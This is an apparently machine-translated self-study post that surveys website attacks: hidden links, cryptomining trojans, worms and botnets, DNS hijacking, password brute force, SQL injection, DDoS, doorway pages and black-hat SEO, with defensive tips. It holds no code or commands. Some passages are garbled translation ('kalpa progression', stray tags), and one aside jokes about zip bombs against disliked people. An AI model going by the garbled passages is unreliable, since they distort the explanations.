Common attack methods on network security websites

This is self-taught by the author, not included in the course content.

A large number of black links appear on the web page

The website looks normal, but some links are hidden. The links on web pages are almost all tags. This kind of black link is to link malicious scripts through the link tag <a></a> or script, waiting for the browser to access, and obtain the browser information through XSS or other methods. , scan for vulnerabilities, and attack the system.

Black chain features

Hiddenness

Dark links are malicious links hidden in the source code of a website, and they are usually invisible to the human eye. It can be hidden by setting the font size to zero in the web page source, using the same font color as the background, or offsetting its position off-screen (extreme offset). It is very possible to touch it by mistake on the web page.

Advertise and get traffic

Black links are often used to pop up unnecessary advertisements and obtain user traffic, thereby achieving profits through deception and illegal means.

Mining and digital currency

Mining

Black links may also be used forillegal mining. When users visit web pages containing dark links, their computer resources (CPU and GPU) may be used by malware for permissionless cryptocurrency mining. Readers who don’t understand mining should not be anxious and understand the meaning first.

• When a computer or mobile phone is infected by a mining virus, the virus will use the processing power (CPU or GPU) of these devices to mine cryptocurrency< a i=2>, this is often done without the knowledge of the device owner.
• This can lead to reduced device performance, overheating, and reduced battery life.

Cryptocurrency

Cryptocurrency is a digital or virtual currency that uses the principles of cryptography to protect transactions, control the creation of new currencies, and verify asset transfers. It is adecentralized currency that is not controlled by any central bank or government. For example, Bitcoin, who has seen it in real life? That's virtual, but it's possible to trade in some countries.

The impact of cryptocurrencies

• Anonymity of transactions: While this provides users with privacy, it may also be used for illegal transactions, such as money laundering and the purchase of illegal goods and services.
• Investment Risk: Cryptocurrency prices fluctuate violently, and investors may face significant losses.
• Security Issues: Cryptocurrency exchanges and wallets are vulnerable to hacker attacks.

Can I use cryptocurrencies?

The use of cryptocurrencies is legal in many countries and regions. It can be used as a method of payment for goods and services and as an investment vehicle. However, some countries have banned or restricted the use of cryptocurrencies, such as China.

Why cryptocurrencies?

• Privacy Protection: Through encryption technology, users’ transactions can be better protected.
• Decentralization: Cryptocurrencies are not controlled by traditional financial institutions and helpreduce transaction costs and time. Its transaction costs are lower than those of banks.
• Financial Inclusion: Providing access to financial services to those who do not have access to traditional banking services.

What is the relationship between cryptocurrency and mining?

Mining is the process of verifying and recording cryptocurrency transactions by using computing power to solve complex mathematical problems. Miners are rewarded with newly generated cryptocurrency and transaction fees.

Mining is not about mining cryptocurrency, it is about mining the answer to a question. Once the answer is mined, you can verify something important and get a cryptocurrency reward. You can then convert the cryptocurrency into actual currency, that is Make money.

Why is Monero popular and what does it do?

Monero (XMR) is aprivacy-focused cryptocurrency. It uses sophisticated cryptography to ensure the anonymity and untraceability of all transactions. This makes it particularly popular among some users and groups, especially those who take privacy very seriously.

What are mining pools used for?

In the context of blockchain and cryptocurrency, the term “miner” can refer to two things:

1. Individuals or entities: Miners can refer to individuals or organizations (such as mining companies or mining pools) that participate in mining activities. They configure and run the hardware, select specific cryptocurrencies to mine, and decide how to optimize their operations.

2. Computer or hardware device: Miners can also refer to computers or specific hardware (such as ASIC mining machines) that perform mining operations. These devices are constantly performing calculations in an attempt to solve mathematical puzzles on the blockchain network.

In most contexts, when people refer to “miners,” they usually refer to individuals or entities involved in mining activities. However, depending on the context, it may also refer to the hardware device that performs the actual computation.

A mining pool is a collection of miners (miners) who combine their computing power to improve solutions< a i=3>The probability of cryptocurrency network hash problem(In fact, this problem is the problem mentioned before, and mining is to mine the answer to this problem, Don’t worry if you don’t understand this issue, the author will write another detailed article). By joining a mining pool, miners can earn profits more consistently, although these profits must be shared with other miners in the pool.

Summarize

In general, mining consists oftrying different input values ​​to finda hash output that satisfies certain conditions< a i=3>, Its main purpose is to verify and record transactions on the network to ensure the security and integrity of transactions . Successful miners are rewarded with newly generated cryptocurrency and transaction fees (the so-called "block reward"). However, criminals may also illegally use other people's computing resources for mining through viruses. This behavior is not allowed and may have a negative impact on the performance and lifespan of the infected device.

The author spent nearly two hours to understand it a little bit. There are too many specific contents, so I will explain them in the new "Blockchain" chapter. Readers and friends can first understand it this way: Mining is about solving problems. Finding the solution to the problem, and then passing the inspection by various people, can ensure the security and stability of the network during the transaction process. Finally, the transaction record and certain previously recorded information are combined into a new block, placed on the blockchain, and finally receive monetary rewards.

---

A large number of embedded web pages appear in the root directory of the website

1. Usually seen when the web page is developed and then thrown on the server.There is no operation and maintenance management (isn’t this just me? );

2. Also seen inupload or download vulnerabilities, such aszip compression bomb< a i=4>, the compressed file is 4KB, and the decompressed file is 4PB, which directly fills up the disk. For example, you can mess with people you don’t like... and email bombs;

3. Also seen inexplosion of website directory content, usually used for large-traffic websites.

---

Website web page hanging horse (Trojan horse)

Tracking usually refers to hackers implanting malicious code or links to malware on normal websites.When users visit this website, the malicious code will be automatically executed, may steal users’ personal information, or use users’ computer resources to conduct illegal activities, such as mining.

1. Types of hanging horses:

   • iFrame injection: Embed an invisible frame in a web page and load a malicious website.
   • JavaScript Trojan: Insert malicious JavaScript code to redirect or download malware.
   • SEO Trojan: Insert spam links or keywords to damage the SEO of the website.

2. How to hang a horse:

   • Exploiting CMS vulnerabilities: Attackers exploit known vulnerabilities in CMS (such as WordPress and Joomla) to insert malicious code.
   • FTP/SSH password theft: Modify website code by stealing FTP or SSH credentials.

3. The purpose of hanging a horse:

   • Distribute malware: Use Trojans to spread malware to visitors' computers.
   • Steal personal information: Use Trojan to steal users’ private data.
   • Utilize computing resources: Use Trojan to utilize users’ computing resources for cryptocurrency mining.

4. Detection and defense of Trojan horse:

   • Update software regularly: Make sure all software and plug-ins are up to date to fix known vulnerabilities.
   • Use security plug-ins: Use security plug-ins to detect and block malicious behavior.
   • Monitor website code: Monitor website code changes to detect the insertion of malicious code in a timely manner.
   • Perform regular security scans: Use a website security scanning tool to regularly scan your website for potential security issues.

---

Website server is running slowly

Essentially, the server has been implanted withworm virus, which is a specific computer program and malicious code.

Worm

• Definition: A worm is a type of malware that replicates itself and spreads to other computers or servers, no human intervention is required.
• Impact: The worm consumes a large amount of system resources (such as CPU and memory), causing the server to become extremely slow.
• Example: A worm may search for vulnerabilities on a network and automatically replicate itself on those systems.

Worm is usually caused by downloading unofficial software, such asautomated operation and maintenance tools. This involves social engineering. It is definitely not to let you know that there is a virus here, but to pretend to be normal. Requirements, tricking you into downloading.

Social Engineering

• Definition: Social engineering involves the use of psychological manipulation to induce individuals to engage in unsafe behavior, such as downloading and installing malware.
• Impact: Users may be tricked into downloading software that appears to be normal but actually contains malicious code.
• Example: A fake automated operation and maintenance tool website may induce visitors to download and install software containing worm viruses.

You can find the CPU usage through background monitoring. If it is too high, it must be attacked, causing memory and disk resources to be exhausted.

tmd worm virus may set up scheduled task to periodically call a script (Shell or Python), that is, < a i=3>Check regularly whether it has been deleted. If it is deleted, it will come back to life and secretly download it back through the remote server.

Broilers may be copied and spread to prepare for DDOS and can be "attacked", which is a means of traffic destruction.

Broiler (Botnet)

• Definition: A botnet or botnet is a network oflarge numbers of computers infected with malware .
• Impact: Infected computers (also known as "zombie computers" or "bots") can be remotely controlled by hackers and used to perform a variety of malicious activities.
• Example: An infected server may be used as part of a deployed DDoS attack.

DDoS attack

• Definition: Distributed Denial of Service Attack (DDoS) is a type of attack that uses large amounts of traffic to An attack in which the target server is unable to respond to legitimate requests.
• Impact: The server may not be able to handle legitimate user requests, resulting in service interruption.

---

Website domain name DNS hijacking

DNS hijacking, also known asDNS redirection, is a type of network attack. The author modified the DNS server settings through illegal means, causing users to access the wrong website address. To put it simply, you want to access the website IP corresponding to this domain name, but I won’t let you access it.I changed my IP to this domain name. In this way, I can attract traffic to my pirated website. You will find that this pirated website is an overseas or domestic website. Trying to ping your own server, the result returned is not the IP of your own website. The following is a detailed introduction to DNS hijacking:

Characteristics and user experience of this attack:

1. Redirect to wrong website: Users try to access a legitimate website (such as a bank website), but because the DNS records have been tampered with, they are redirected to a malicious website.

2. Normal-looking website: A hijacked website usually looks very similar to the original website, making it difficult for users to detect it.

3. Information leakage risk:Users may enter sensitive information (such as username, password, credit card information, etc.) on these malicious websites, resulting in Information leakage.

4. Undetectable tampering:A user may be completely unaware that a DNS record has been tampered with because the URL itself has not changed, only the content and target server have changed.

1. Principle and Execution

a) DNS system

• DNS (Domain Name System) is a core service of the Internet. It serves asa distributed database that maps domain names and IP addresses to each other, enabling users to access the Internet more conveniently.

b) kalpa progression

• Attackers use various means to tamper with the data of the DNS server. When a user tries to access a specific website, the tampered DNS server returns an incorrect IP address and redirects the user to a server controlled by the attacker.

2. Attack method

a) Tampering with DNS server

• The attacker invades and controlsDNS server, directly modifying the mapping relationship between domain names and IP addresses.

b) Honji kalmo

• Modify the DNS settings ofuser's computer through malware, causing the domain name requested by the user to resolve to the wrong IP address.

3. effect

• Users are redirected to fake websites that may steal their personal and sensitive information.
• Fake websites may force users to download malware that takes control of their computers.
• Redirects allow attackers to monetize traffic by directing large amounts of traffic to sites they control.

4. Prevention measures

• Check DNS settings regularly to ensure that the DNS settings of computers and network devices have not been illegally modified.
• Use a secure DNS serverUse a well-known and secure DNS service provider, such as Google DNS or Cloudflare DNS.

• Use DNS encryption,Use DNS over HTTPS or DNS over TLS technology to ensure the security and privacy of DNS queries.

---

Website and server passwords have been tampered with

1. SSH service---22 end

SSH (Secure Shell Protocol) usually runs on port 22. If it is configured improperly (e.g. using a weak password or not disabling root remote login), an attacker may attempt to guess the password using a brute force attack to gain unauthorized access to SSH. Serve.

Protection methods

• Use strong passwords and public key authentication.
• Change the default port for the SSH service.
• Use a firewall to restrict access to port 22.
• Use a fail lockout policy to block multiple failed login attempts.

2. Remote connection---port 3389

• Port 3389 is the default port of WindowsRemote Desktop Services (RDS).
• If a server's RDP service is exposed to the Internet and uses a weak password or has other security vulnerabilities, an attacker can exploit these vulnerabilities to gain remote access to the server.
• Windows now has a sticky key prompt when clicking shift five times in a row, and the sticky key vulnerability is usually used to gain unauthorized access to the system. If an attacker is able to activate sticky keys on a remote system, they may try to exploit this feature to run commands as another user.

---

The website’s database is embedded with content

When we talk about "embedded content in a website's database," we usually mean that unauthorized third parties have accessed and modified the contents of the database through various means. Such attacks are a significant security threat to any organization as they can lead to the corruption, loss or leakage of data. This process may cover a range of attacks, including SQL injection, malware infection, and other attacks carried out through network vulnerabilities.

1. Database implant content

• Attackers exploit database vulnerabilities or flaws to insert malicious content into the database. This may include malicious scripts, links to malware, or other code used to further attacks or steal information.
• The implanted content in the database means that the attacker has successfully accessed the database, which may not only cause the integrity and authenticity of the data to be compromised, but may also cause the entire application or System failure.

2. SQL爆库

• SQL database explosion refers to gaining access to the database by exploiting security vulnerabilities in the database, andstealing or destroying the data . This attack is particularly common against common database systems such as MySQL.
• SQL database explosionis usually achieved through SQL injection. SQL injection is a method of injecting malicious SQL code into a query, thereby bypassing the application's security mechanisms and interacting directly with the database. A successful SQL injection can give the attacker full access to the database, allowing them to execute arbitrary SQL code, including insert, modify, and delete operations.

3. Advance attack

• Ransom attack: An attacker locks the data in a database and demands a ransom to unlock the data. This type of attack poses a particular threat to those institutionsthat have strict requirements for data security and availability (e.g. banks, schools, governments).
• Ransomware attacks are often carried out as part of other types of attacks, such as SQL database explosions. Once attackers gain access to a database, they can use a variety of techniques to lock down the data.

Database optimization involves how to store, retrieve, and manage data in a database most efficiently. Poorly optimized databases can expose performance bottlenecks, erratic application response times, and potential security risks. Here are some database protection measures:

• Follow safe programming practices, such as usingparameterized queries to prevent SQL injection.
• Regularly update and patch database software to close known security holes.
• Usestrong passwords and multi-factor authentication to increase database security.
• Restrict database access to ensure that only the people or systems that need access have the appropriate permissions.

---

DDOS

1. concept:

DDoS (Distributed Denial of Service, distributed denial of service attack) is a type of that causes the target network resources to be overloaded and unable to be provided normally Service's attack method. In this kind of attack, the attacker uses many "broilers" (controlled computers) to send a large number of data requests to the target at the same time, exceeding the target server. processing power, thereby making it inaccessible to normal users.

2. Machine system:

1. Broiler Network: The attacker first infects a large number of computers through various means and combines these computers into a "Broiler Network”.
2. Launch attack: The attacker instructs these broilers to send a large number of requests to the target server at the same time, causing the server to be overloaded.
3. Service interruption: The server cannot handle such a huge amount of traffic,Normal user requests cannot be responded to, to achieve denial of service.

3. Actual building scene:

• Gaming companies or large websites are common targets for DDoS attacks. For example, a newly launched game may be subject to a DDoS attack, causing players to be unable to access the game server.
• Some attackers use DDoS attacks as a means of extortion. They attack target websites and then demand payment to stop the attack.

4. Prevention measures:

• Although it is difficult and costly to defend against DDoS attacks, taking some measures, such as usingDDoS protection services, can effectively mitigate the impact of attacks.

5. Legal issues:

• Launching a DDoS attack is illegal in many countries and is considered a cybercrime. DDoS attacks will not only cause service interruption, but may also cause economic losses and reputational damage to the enterprise.

---

Illegal bridge page

Illegal bridge page, also known asportal site or portal page, is mainly used for A way of forwarding or redirecting web traffic to a specific website or page.

Bridge pages are created for search engine optimization (SEO), and their main purpose is to obtain high rankings in search engines, thereby benefiting the advertising or other services behind them. These pages provide search engines with specific keywords and content, but when users click on the search results link, they may be redirected to other pages that are not relevant to the search query. Often used in black hat SEO tactics, the goal is to trick search engines, achieve high rankings, and then redirect traffic to other websites that may not be relevant to the original search query.

In other words, the main function of illegal bridge pages isto automatically jump users from one website to another without knowing it . For example, you might click on a link about healthy eating and suddenly find yourself taken to a completely unrelated sales site. This is the illegal bridge page at work. It quietly changes your browsing direction behind the scenes, possibly to increase traffic to unrelated websites or to promote products.

1. Misleading search results: When users search for information on search engines, they may encounter these bridge pages, which usually contain a large number of keywords but low-quality content.

2. Redirects: After clicking on these bridge pages, users may be redirected to other websites unrelated to the search content, such as advertising pages or other fraudulent websites.

3. Irrelevant or low-quality content: The content of the bridge page is often irrelevant to the user's search query or is low-quality, copy-pasted content.

4. Poor user experience: This type of attack has a greater impact on the user experience because it prevents users from getting the information they really need.

---

Implemented via JS

Illegal bridge pages are usually implemented byinserting malicious JavaScript code into legitimate websites. When a user visits this page with JS code embedded in it, the JS code is automatically executed and the user is redirected to another page. This is a commonblack hat search engine optimization (SEO) tactic.

---

301 redirect

301 redirect is another way to implement illegal bridge page. This redirection ispermanent and is often usedto redirect traffic from one URL to another URL. Illegal operators exploit this to redirect traffic from legitimate web pages to their own or other unrelated web pages.

• Example: The URL of a well-known blog is set with a 301 redirect, and all traffic to this blog is redirected to a website selling counterfeit products.

Illegal bridge pages exploit users' trust and lack of knowledge to generate traffic and revenue for illegal or unethical websites. By using JavaScript or 301 redirects, they silently divert users away from the website they originally intended to visit, which not only affects the user's online experience, but may also expose users to security risks.

Although illegal bridge pages may bring benefits to the operators in the short term, they destroy the entire network ecosystem, cause harm to users and legitimate websites, and also violate the policies of most search engines. Many search engines such as Google willregularly check and lower the search rankings of websites that use this strategy.

---

The author's personal experience

When I was reading an article before, there was an article link inside the article, and then I clicked it and jumped to a football gambling website. This was not obtained through a search. Is it an illegal bridge page?

This is actually an "illegal bridge page" behaviorin a broad sense, but more accurately, it belongs to. Including but not limited to search engine results. Although illegal bridge pages are often associated with improving search engine rankings, their core feature is to mislead users to jump to websites that are not related to the original content. This can occur in a variety of scenarios."Malicious redirects" or "clickjacking"

In the author's case, the link within the article appeared to lead to relevant content, but actually redirected the author to a completely unrelated football gambling website. This behavior is consistent with the characteristics of malicious redirects:

1. Misleading links: A link that looks like it leads to a related article or content, but actually leads to an entirely different destination.

2. Hurt to the user experience: This type of redirect harms the user experience because the user expects content relevant to the original article rather than being sent to an irrelevant website. .

3. Potentially malicious purposes: This type of redirect is often used to promote a specific website, commit ad fraud, or in worse cases, distribute malware.

While this situation may not technically be strictly defined as an illegal bridge page in the traditional sense, it does qualify asa malicious redirect characteristics, which belong to the category of network security issues. The best thing for users to do when encountering such situations is to be cautious about clicking on unknown links and use reliable network security tools to protect their devices and information.

---

Black Hat SEO

Black hat search engine optimization (SEO) refersto the use of techniques and strategies that violate search engine recommended guidelines. The goal of these tactics is to trick search engines in order to achieve higher search rankings, even if those rankings are not based on the true value or relevance of the website content. While black hat SEO methods may sometimes result in a short-lived ranking boost, they are more likely to result in your site being penalized by search engines in the long term, and sometimes even removed from search results entirely.

Here are some common black hat SEO tactics:

1. Keyword Stuffing: The overuse or repetition of keywords on a web page in an attempt to improve the page's ranking in search results.

2. Hidden text and links: Hides text or links on a web page using the same color as the background, making it invisible to users but visible to search engines.

3. Illegal doorway pages (Doorway Pages): Create specific pages for search engines. These pages have no actual value to users, but when users visit, they will be redirected to Another page.

4. Link Farms: Creating a large number of interconnected websites or pages simply to increase the number of external links to the website.

5. Content Scraping: Copying content from another website and then posting it on your own site.

6. Sneaky Redirects: Allow users and search engines to see different content. For example, when a search engine crawls a page, it displays keyword-optimized content, but when a user visits, it will be redirected to an irrelevant page.

7. Negative SEO: Attempts to harm a competitor’s search rankings. This may include creating low-quality, spammy backlinks to competitor websites.

8. Overuse of anchor text: Excessive use of the same, optimized anchor text in external links.

---

Cybersecurity range (non-attack means part)

Cybersecurity Range (also known asOffensive and Defense Lab or Penetration Testing Lab for security professionals, researchers, and learners. It provides a safe and legal platform that allows users to learn and understand various network security concepts and technologies without affecting the actual production environment. Attack techniques. Practice and test their network penetration skills and defense strategiescontrolled environment that simulates a real-world network environment) is a

The composition and function of the shooting range

1. Experimental environment:

   • Generally includes various operating systems and application software.
   • Containsknown security vulnerabilities for testing and experimentation purposes.

2. Simulated attack:

   • Users can simulate real-world attack scenarios.
   • Can practicepenetration testing, vulnerability exploitation, password cracking and other technologies.

3. Defense Strategy:

   • Provide an experimental environment for testing and validating defense strategies and tools.
   • Help users understand how to detect, prevent, and respond to attacks.

4. Academic research:

   • Help beginners and experts understand and learn the latest attack techniques and defense strategies.
   • Promote cybersecurity research and development.

5. Comprehensive examination:

   • Allows organizations to test their systems and networks to ensure compliance with security standards and regulations.

The relationship between the shooting range and the actual network environment

The range provides an environment that closely resembles an actual network environment, but isoperated in a controlled and isolated environment , to prevent any accidental damage to real systems and data. By conducting experiments and testing on the range, users can better understand and assess their network security posture and identify potential security issues and vulnerabilities to better protect against them in real-world environments.

How to set up or use a shooting range?

1. Use a public range platform:
   • There are some online platforms such as Hack The Box or CTF platform that provide cyber security shooting range services.
2. Private building:
   • Users can also build their own shooting range using open source or commercial software.
   • Virtualization technologies such as VMware or VirtualBox allow users to create multiple virtual machines on a single piece of physical hardware, which can be used as a shooting range environment. If the author studies further, he will use virtualization technology to build an offensive and defensive environment.

Summarize

The cybersecurity range is an important part of the cybersecurity field. It allows users to practice, test, and learn cybersecurity technologies. Whether it is attack techniques or defense strategies, they can have in-depth understanding and practice in the range, thereby improving users' ability in real environments. network security capabilities.